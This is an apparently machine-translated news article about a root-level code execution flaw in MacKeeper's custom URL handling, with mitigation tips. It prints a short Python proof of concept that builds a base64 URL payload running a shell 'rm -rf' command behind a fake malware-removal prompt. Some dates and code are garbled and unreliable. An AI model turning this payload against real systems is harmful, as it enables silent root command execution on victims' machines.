Mac "MacKeeper" exposes Arbitrary Code Execution Vulnerability

Source: Internet
Author: User
Tags uninstall mackeeper

Mac  "MacKeeper" exposes Arbitrary Code Execution Vulnerability

I believe Mac users must have seen Mackeeper ads-a Mac OS system optimization software that integrates anti-virus, encryption, data backup, system cleaning, and software uninstallation, it can be considered as  of the Mac.

On July 6, May 7, Mackeeper was found to have a serious security vulnerability. The remote code execution vulnerability exists in its URL-handling code. When a user accesses a maliciously crafted webpage, the high-risk vulnerability is triggered.

Vulnerability description

Security researcher Braden Thomas discovered this vulnerability. When a user accesses a malicious website, he can execute arbitrary code as Root with the highest system permission without having to perform any interaction, he also published the POC (vulnerability verification program) to demonstrate that users can execute arbitrary code when accessing malicious websites using Safari. The Code executed in the POC is to uninstall MacKeeper. The cause of the vulnerability is that MacKeeper does not perform a security check on the input data when executing commands using a custom URL structure.

If MacKeeper prompts the user to enter the password during normal operations, the user will not be prompted to enter the password when executing any code with the root permission. If the user has not passed the authentication before, MacKeeper will prompt the user to enter the account password. However, the exploitation of vulnerabilities is exactly the characters entered by these users, so the user may feel the vulnerability exploitation process.

Apple allows OSX and iOS apps to customize the URL structure. These URLs can register system events to remove other apps from the system and process the current URL. Normally, this function uses custom protocols to perform specified operations (for example, when you click a phone number link on iOS, the system will ask you if you want to make a call, when you click an email address, the system starts the email APP. The APP built in the Apple system clearly tells developers that they need to perform a security check on the entered custom URL, to prevent exceptions during URL Processing. In addition, Apple also pointed out the importance of security checks on input data in official documents.

Impact Scope

Since this 0day also exists in the latest MacKeeper (MacKeeper 3.4), many users are affected. According to a previous report, tens of millions of users are affected. MacKeeper is a controversial application in the Mac community. users complain that it frequently uses pop-up windows to push advertisements.
Now the POC of this vulnerability has been published, so MacKeeper users are prone to attacks.

POC:
Import sys, base64
From Foundation import *
RUN_CMD = "rm-rf/Applications/MacKeeper. app; pkill-9-a MacKeeper"
D = NSMutableData. data ()
A = NSArchiver. alloc (). initForWritingWithMutableData _ (d)
A. encodeValueOfObjCType_at _ ("@", NSString. stringWithString _ ("NSTask "))
A. encodeValueOfObjCType_at _ ("@", NSDictionary. dictionaryWithObjectsAndKeys _ (NSString. stringWithString _ ("/bin/sh"), "LAUNCH_PATH", NSArray. arrayWithObjects _ (NSString. stringWithString _ ("-c"), NSString. stringWithString _ (RUN_CMD), None), "ARGUMENTS", NSString. stringWithString _ ("Your computer has malware that needs to be removed. ")," PROMPT ", None ))
Print "com-zeobit-command: // I/ZBAppController/javasmactionwithhelpertask: arguments:/" + base64.b64encode (d)
Https://twitter.com/drspringfield/status/596316000385167361

Security suggestions

MacKeeper users should Update to the latest version immediately. By default, MacKeeper automatically checks for updates. When the MacKeeper prompts an upgrade, click OK to install the update.

Of course, you can avoid attacks in some ways. On OS X, click a custom link in the Safari browser to call the application specified in the system to process the corresponding URL. In other browsers, such as the chrome browser, you will be prompted whether you agree to open the link to this self-owned agreement.
For technical tips, try to use browsers other than Safari. In this way, the system will prompt you before executing any code. Technically, you can remove URL-related code from the Info. plist file of MacKeeper.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.